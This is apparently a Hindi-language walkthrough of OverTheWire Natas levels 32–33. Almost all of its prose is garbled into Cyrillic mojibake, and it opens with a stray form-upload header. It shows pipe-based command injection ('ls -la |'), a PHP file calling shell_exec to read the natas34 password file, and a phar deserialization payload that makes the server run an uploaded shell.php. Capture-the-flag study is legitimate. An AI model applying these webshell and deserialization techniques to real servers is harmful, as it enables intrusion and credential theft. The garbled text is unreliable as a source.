-----------------------------716973545450730846281908502 Content-Disposition: form-data; name="file"; Content-Type: text/csv ARGV


рд╣рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рдорд┐рд▓рддрд╛ рд╣реИред
рд╕реНрддрд░ 32
рд╣рдо рдЙрд╕ рдкреГрд╖реНрда рдХреЛ рдЦреЛрд▓рддреЗ рд╣реИрдВ рдЬрд╣рд╛рдВ рд╣рдореЗрдВ рдмрддрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рд╣рдореЗрдВ рдХреЛрдб рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреЛ рд╕рд╛рдмрд┐рдд рдХрд░рдиреЗ рдФрд░ рд╡реЗрдмрд░реЛрдЯ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред

рдпрджрд┐ рдЖрдк рдХреЛрдб рдХреЛ рджреЗрдЦрддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ рдкрд┐рдЫрд▓реЗ рд╕реНрддрд░ рдХреА рддрд░рд╣ рд╣реА рд╣реИред рдлрд┐рд░ рд╣рдо рдкрд┐рдЫрд▓реА рдмрд╛рд░ рдХреА рддрд░рд╣ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рддреЗ рд╣реИрдВред рдЪрд▓реЛ рд╡реЗрдмрд░реЛрдЯ рдлрд╝рд╛рдЗрд▓ рдвреВрдВрдврддреЗ рд╣реИрдВред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдПрдХ рд▓реЛрдб рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЛ рджреЗрдЦреЗрдВ: ls -la |

рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред рд╡реЗрдмрд░реЛрдЯ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдПрдХ рдЕрдЬреАрдм рдкреНрд░реЛрдЧреНрд░рд╛рдо рдЧреЗрдЯрдкрд╛рд╕ рд╣реИред
рд╣рдо рдЗрд╕реЗ рдмрд╛рд╣рд░ рд▓реЗ рдЬрд╛рддреЗ рд╣реИрдВред


рд╣рдореЗрдВ рдЕрдВрддрд┐рдо рд╕реНрддрд░ рдХреЗ рд▓рд┐рдП рдкрд╛рд╕рд╡рд░реНрдб рдорд┐рд▓рддрд╛ рд╣реИред

рд╕реНрддрд░ 33
рдлрд┐рд░ рд╕реЗ рдлрд╛рдЗрд▓ рдЕрдкрд▓реЛрдб рдлреЙрд░реНрдоред

рд╕реНрд░реЛрдд рдХреЛрдб рджреЗрдЦреЗрдВред

рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд╣рдореЗрдВ рд╕рд░реНрд╡рд░ рдореЗрдВ 4 рдПрдордмреА рддрдХ рдХреА рдлрд╝рд╛рдЗрд▓ рдЕрдкрд▓реЛрдб рдХрд░рдиреА рдЪрд╛рд╣рд┐рдП рдФрд░ рдпрджрд┐ рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХрд╛ md5 рд╕рдВрджрд░реНрдн рдорд╛рди рдХреЗ рдмрд░рд╛рдмрд░ рд╣реИ, рддреЛ рдЗрд╕реЗ php рджреБрднрд╛рд╖рд┐рдпрд╛ рдореЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рд╣рдо рдЖрдЧреЗ рджреЗрдЦрддреЗ рд╣реИрдВред рд╣рдо рдлрд╝рд╛рдЗрд▓ рдирд╛рдо рдФрд░ рдЙрд╕рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдирд┐рдпрдВрддреНрд░рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдореИрдВ рддреБрд░рдВрдд рдХрд╣реВрдВрдЧрд╛ рдХрд┐ рдпрд╣ рдПрдХ рдЬрдЯрд┐рд▓ рднреЗрджреНрдпрддрд╛ рд╣реИ рдЬреЛ рдореБрдЭреЗ рдЖрдзреЗ рд╕рд╛рд▓ рдкрд╣рд▓реЗ рдорд┐рд▓реА рдереАред рдпрд╣ рдЗрд╕ рдЙрджреНрджреЗрд╢реНрдп рд╕реЗ рд╣реИ рдХрд┐ рд╣рдо рд╕рд░реНрд╡рд░ рдкрд░ рдХрд┐рд╕реА рднреА рдкреНрд░рдХрд╛рд░ рдХреА рдлрд╝рд╛рдЗрд▓ рдЕрдкрд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЗ рд╕рд╛рде рдХреЛрдИ рднреА рд╕рдВрдЪрд╛рд▓рди рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рдлрд╝рд╛рд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ
рдпрд╣рд╛рдБ рд▓рд┐рдЦрд╛ рдЧрдпрд╛
рд╣реИ ред рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ, рдХреНрд░рдордмрджреНрдз рдбреЗрдЯрд╛ рдХрд╛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рдПрдХ рд╡рд┐рд╢реЗрд╖ php рдЖрд░реНрдХрд╛рдЗрд╡ред рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рдлрд╝реИрд░ рд╕реНрдЯреНрд░реАрдо рдкрдврд╝рдиреЗ рд╕реЗ рдХреЛрдб рдХрд╛ рдирд┐рд╖реНрдкрд╛рджрди рд╣реЛрдЧрд╛ред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдЖрдк рдХреЛрдб рдХреЛ рдХреНрд░рдордмрджреНрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕реЗ рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬ рд╕рдХрддреЗ рд╣реИрдВред Md5 рдХреА рдЧрдгрдирд╛ рдХрд░рддреЗ рд╕рдордп, рдПрдХ рдзрд╛рд░рд╛ рдкрдврд╝реА рдЬрд╛рдПрдЧреА - рдЬрд┐рд╕рд╕реЗ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рд╣реЛрдЧрд╛ред
рдЗрд╕рд▓рд┐рдП рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ рдПрдХ php рдлрд╛рдЗрд▓ рдмрдирд╛рдПрдВ рдЬрд┐рд╕рдореЗрдВ рдЭрдВрдбрд╛ рд▓рд┐рдЦрд╛ рд╣реЛред
<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>
рдЗрд╕реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВред рдмрд░реНрдк рд╕реВрдЯ рдореЗрдВ рдирд╛рдо рдмрджрд▓рдирд╛ рди рднреВрд▓реЗрдВред


рд╣рдореЗрдВ рд╕рд░реНрд╡рд░ рдХреА рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдорд┐рд▓рддреА рд╣реИ ... рдареАрдХ рд╣реИред рдЕрдм рдПрдХ рдлрд╝рд╛рд░ рдЖрд░реНрдХрд╛рдЗрд╡ рдмрдирд╛рдПрдВ, рдЬрд┐рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╕рдордп рд╣рдореЗрдВ рдЙрди рдореВрд▓реНрдпреЛрдВ рдХреЛ рдмрджрд▓рдирд╛ рд╣реЛрдЧрд╛ рдЬрд┐рдирдХреА рд╣рдореЗрдВ рдЬрд╝рд░реВрд░рдд рд╣реИ (рд╣реИрд╢ рд╣рдореЗрд╢рд╛ рд╕рд╣реА рд╣реЛрдЧрд╛ рдФрд░ рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдирд╛рдо рдЬреЛ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ)ред рддреЛ рд╣рдо рдЪреЗрдХ рдХреЛ рдкрд╛рд╕ рдХрд░реЗрдВрдЧреЗ рдФрд░ рд╕рд░реНрд╡рд░ рд╢реЗрд▓.рдПрдлрдкреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдЧрд╛ред
<?php class Shell { private $filename = "shell.php"; private $signature = True; private $init = false; } $phar = new Phar("shell.phar"); $phar->startBuffering(); $phar->addFromString("123.txt", '123'); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $s = new Shell(); $phar->setMetadata($s); $phar->stopBuffering(); ?>
/Etc/php/xx/php.ini рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ, рдЖрдкрдХреЛ phar.readonly рдкреИрд░рд╛рдореАрдЯрд░ рдХреЛ рдСрдлрд╝ рдореЗрдВ рдмрджрд▓рдирд╛ рд╣реЛрдЧрд╛ред

рдЗрд╕рдХреЗ рдмрд╛рдж, php shell.php рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ рдФрд░ рд╣рдореЗрдВ .phar рдлрд╝рд╛рдЗрд▓ рдорд┐рд▓рддреА рд╣реИред рд╣рдо рдЗрд╕реЗ рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬрддреЗ рд╣реИрдВ рдФрд░ рдирд╛рдо рдмрджрд▓рддреЗ рд╣реИрдВред

рдЗрд╕рд▓рд┐рдП рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рджреЛрдиреЛрдВ рдлрд╛рдЗрд▓реЗрдВ рд╣реИрдВ: рд╕рдВрдЧреНрд░рд╣ рдФрд░ рд╢реЗрд▓ред рдЕрдм рдЖрдкрдХреЛ рд╕рдВрдЧреНрд░рд╣ рд╕реЗ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рд╣реЛ рдЬрд╛рдПрдЧрд╛ред

рд╣рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рдорд┐рд▓рддрд╛ рд╣реИред

рд╡рд╣ рдирд╛рдЯрд╛ рд╕реНрдерд▓ рдерд╛ред рдЖрдк
рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдкрд░ рд╣рдорд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред